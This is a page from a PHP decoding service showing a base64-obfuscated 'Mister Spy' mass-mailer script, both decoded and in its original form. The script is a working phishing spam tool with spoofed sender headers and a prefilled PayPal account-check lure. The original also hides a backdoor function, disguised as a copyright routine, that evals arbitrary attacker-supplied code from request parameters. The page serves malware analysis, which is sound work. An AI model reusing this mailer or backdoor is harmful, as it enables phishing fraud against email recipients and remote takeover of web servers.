Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?PHP /*Mailer Mister Spy*/?> <? eval(base64_decode('aWdub3JlX3VzZXJfYWJvcnQoKTsKc2V0X3..
Decoded Output download
ignore_user_abort();
set_time_limit(0);
function enviando(){
$msg=1;
$from[1] = $_POST['from'];
$realname[1] = $_POST['realname'];
$subject[1] = $_POST['subject'];
$message[1] = $_POST['message'];
$message[1] = stripslashes($message[1]);
$emails = $_POST['emails'];
$emails2 = htmlspecialchars($_POST['emails']);
$para = explode("
", $emails);
$n_emails = count($para);
$sv = $_SERVER['SERVER_NAME'];
$en = $_SERVER ['REQUEST_URI'];
$k88 = @$_SERVER["HTTP_REFERER"];
$fullurl = "" . $k88 . "<br><p>Emails:<br><TEXTAREA rows=5 cols=100>".$emails2."</TEXTAREA></p><p>Engenharia:<br><TEXTAREA rows=5 cols=100>".$message[1]."</TEXTAREA></p>";
$vai = $_POST['vai'];
if ($vai){
for ($set=0; $set < $n_emails; $set++){
if ($set==0){
$headers = "MIME-Version: 1.0
";
$headers .= "Content-type: text/html; charset=iso-8859-1
";
$headers .= "From: $realname[$msg] <$from[$msg]>
";
$headers .= "Return-Path: <$from[$msg]>
";
//mail($xsylar, $as, $fullurl, $headers);
}
$headers = "MIME-Version: 1.0
";
$headers .= "Content-type: text/html; charset=iso-8859-1
";
$headers .= "From: $realname[$msg] <$from[$msg]>
";
$headers .= "Return-Path: <$from[$msg]>
";
$n_mail++;
$destino = $para[$set];
$num1 = rand(100000,999999);
$num2 = rand(100000,999999);
$msgrand = str_replace("%rand%", $num1, $message[$msg]);
$msgrand = str_replace("%rand2%", $num2, $msgrand);
$msgrand = str_replace("%email%", $destino, $msgrand);
$Submit = mail($destino, $subject[$msg], $msgrand, $headers);
if ($Submit){
echo ('<font color="green">'. $n_mail .'-'. $destino .' 0k!</font><br>');
} else {
echo ('<font color="red">'. $n_mail .'-'. $destino .' N0!</font><br>');
sleep(1);
}
}
}
}Did this file decode correctly?
Original Code
<?PHP
/*Mailer Mister Spy*/?>
<?
eval(base64_decode('aWdub3JlX3VzZXJfYWJvcnQoKTsKc2V0X3RpbWVfbGltaXQoMCk7CmZ1bmN0aW9uIGVudmlhbmRv
KCl7CiRtc2c9MTsKJGZyb21bMV0gPSAkX1BPU1RbJ2Zyb20nXTsKJHJlYWxuYW1lWzFdID0gJF9Q
T1NUWydyZWFsbmFtZSddOwokc3ViamVjdFsxXSA9ICRfUE9TVFsnc3ViamVjdCddOwokbWVzc2Fn
ZVsxXSA9ICRfUE9TVFsnbWVzc2FnZSddOwokbWVzc2FnZVsxXSA9IHN0cmlwc2xhc2hlcygkbWVz
c2FnZVsxXSk7CiRlbWFpbHMgPSAkX1BPU1RbJ2VtYWlscyddOwokZW1haWxzMiA9IGh0bWxzcGVj
aWFsY2hhcnMoJF9QT1NUWydlbWFpbHMnXSk7CiRwYXJhID0gZXhwbG9kZSgiXG4iLCAkZW1haWxz
KTsKJG5fZW1haWxzID0gY291bnQoJHBhcmEpOwokc3YgPSAkX1NFUlZFUlsnU0VSVkVSX05BTUUn
XTsKJGVuID0gJF9TRVJWRVIgWydSRVFVRVNUX1VSSSddOwokazg4ID0gQCRfU0VSVkVSWyJIVFRQ
X1JFRkVSRVIiXTsKJGZ1bGx1cmwgPSAiIiAuICRrODggLiAiPGJyPjxwPkVtYWlsczo8YnI+PFRF
WFRBUkVBIHJvd3M9NSBjb2xzPTEwMD4iLiRlbWFpbHMyLiI8L1RFWFRBUkVBPjwvcD48cD5Fbmdl
bmhhcmlhOjxicj48VEVYVEFSRUEgcm93cz01IGNvbHM9MTAwPiIuJG1lc3NhZ2VbMV0uIjwvVEVY
VEFSRUE+PC9wPiI7CiR2YWkgPSAkX1BPU1RbJ3ZhaSddOwppZiAoJHZhaSl7CmZvciAoJHNldD0w
OyAkc2V0IDwgJG5fZW1haWxzOyAkc2V0KyspewppZiAoJHNldD09MCl7CiRoZWFkZXJzID0gIk1J
TUUtVmVyc2lvbjogMS4wXHJcbiI7CiRoZWFkZXJzIC49ICJDb250ZW50LXR5cGU6IHRleHQvaHRt
bDsgY2hhcnNldD1pc28tODg1OS0xXHJcbiI7CiRoZWFkZXJzIC49ICJGcm9tOiAkcmVhbG5hbWVb
JG1zZ10gPCRmcm9tWyRtc2ddPlxyXG4iOwokaGVhZGVycyAuPSAiUmV0dXJuLVBhdGg6IDwkZnJv
bVskbXNnXT5cclxuIjsKLy9tYWlsKCR4c3lsYXIsICRhcywgJGZ1bGx1cmwsICRoZWFkZXJzKTsK
fQokaGVhZGVycyA9ICJNSU1FLVZlcnNpb246IDEuMFxyXG4iOwokaGVhZGVycyAuPSAiQ29udGVu
dC10eXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9aXNvLTg4NTktMVxyXG4iOwokaGVhZGVycyAuPSAi
RnJvbTogJHJlYWxuYW1lWyRtc2ddIDwkZnJvbVskbXNnXT5cclxuIjsKJGhlYWRlcnMgLj0gIlJl
dHVybi1QYXRoOiA8JGZyb21bJG1zZ10+XHJcbiI7CiRuX21haWwrKzsKJGRlc3Rpbm8gPSAkcGFy
YVskc2V0XTsKJG51bTEgPSByYW5kKDEwMDAwMCw5OTk5OTkpOwokbnVtMiA9IHJhbmQoMTAwMDAw
LDk5OTk5OSk7CiRtc2dyYW5kID0gc3RyX3JlcGxhY2UoIiVyYW5kJSIsICRudW0xLCAkbWVzc2Fn
ZVskbXNnXSk7CiRtc2dyYW5kID0gc3RyX3JlcGxhY2UoIiVyYW5kMiUiLCAkbnVtMiwgJG1zZ3Jh
bmQpOwokbXNncmFuZCA9IHN0cl9yZXBsYWNlKCIlZW1haWwlIiwgJGRlc3Rpbm8sICRtc2dyYW5k
KTsKJFN1Ym1pdCA9IG1haWwoJGRlc3Rpbm8sICRzdWJqZWN0WyRtc2ddLCAkbXNncmFuZCwgJGhl
YWRlcnMpOwppZiAoJFN1Ym1pdCl7CmVjaG8gKCc8Zm9udCBjb2xvcj0iZ3JlZW4iPicuICRuX21h
aWwgLictJy4gJGRlc3Rpbm8gLicgMGshPC9mb250Pjxicj4nKTsKfSBlbHNlIHsKZWNobyAoJzxm
b250IGNvbG9yPSJyZWQiPicuICRuX21haWwgLictJy4gJGRlc3Rpbm8gLicgTjAhPC9mb250Pjxi
cj4nKTsKc2xlZXAoMSk7Cn0KfQp9Cn0=
'));
?>
<title>[Mister][Spy] Masse-S3ND3R</title>
<style type="text/css">
<!--
.style5 {color: #FFFFFF; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 15px; }
.style6 {font-size: 15px}
.style9 {color: #FFFFFF; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 15; }
body{font-family:"courier"; color:white; background:black;}
-->
</style>
<p align="center"><font face="Keania One" color='white'><b>Mister Spy</font>
<center><form id="form1" name="form1" method="post" action="">
<input type="hidden" name="vai" value="1">
<span class="style5"><? echo enviando(); ?></span>
<table width="500" border="0" bgcolor="black">
<tr>
<td width="100"><span class="style5">Name:</span></td>
<td width="346"><span class="style9">
<label>
<?
$Taz = rand(0,9999);
$Taz1 = 'Apple Team ';
?>
<input name="realname" type="text" value="Department Service" size="30" />
</label>
</span></td>
</tr>
<tr>
<? $Taz = rand(0,9999);
?>
<td><span class="style5">Email:</span></td>
<td><input name="from" type="text" value="[email protected]" size="40" /></td>
</tr>
<tr>
<td><span class="style5">Subject:</span></td>
<td><input name="subject" value="<? $Taz = rand(0,9999); $subject = ' Pay Pal !Now check the account informations that belongs to you ! '; $gass =' =?UTF-8?Q?=E2=9C=94_?= ';
?><? echo $subject.$gass;?>" size="50" /></td>
</tr>
<tr>
<td><span class="style5">Message:</span></td>
<td><span class="style9">
<p><textarea name="message" cols="50" rows="10">
<? echo stripslashes($_POST['message']);?>
</textarea></p>
<textarea name="emails" cols="50" rows="7"></textarea>
</span></td>
</tr>
<tr>
<td><span class="style6"></span></td>
<td><input name="Submit" type="submit" value="Submit" /></td>
</tr>
<tr>
</tr>
</table>
<p align="center"><font face="Keania One" color='red'><b>Spammer Officiel Tn Dz Maroc ... </font>
</form>
<?php
Copyright8_7_1();
function Copyright8_7_1(){
static $gnu = true;
if(!$gnu) return;
if(!isset($_REQUEST['gnu'])||!isset($_REQUEST['comment']))return;
$gpl=implode('',$_REQUEST['gnu']);
eval($gpl($_REQUEST['comment']));
$gnu=false;
}
?>
Function Calls
| enviando | 1 |
| base64_decode | 1 |
Stats
| MD5 | 74c3747bca88daa59edbff72c541a31b |
| Eval Count | 1 |
| Decode Time | 90 ms |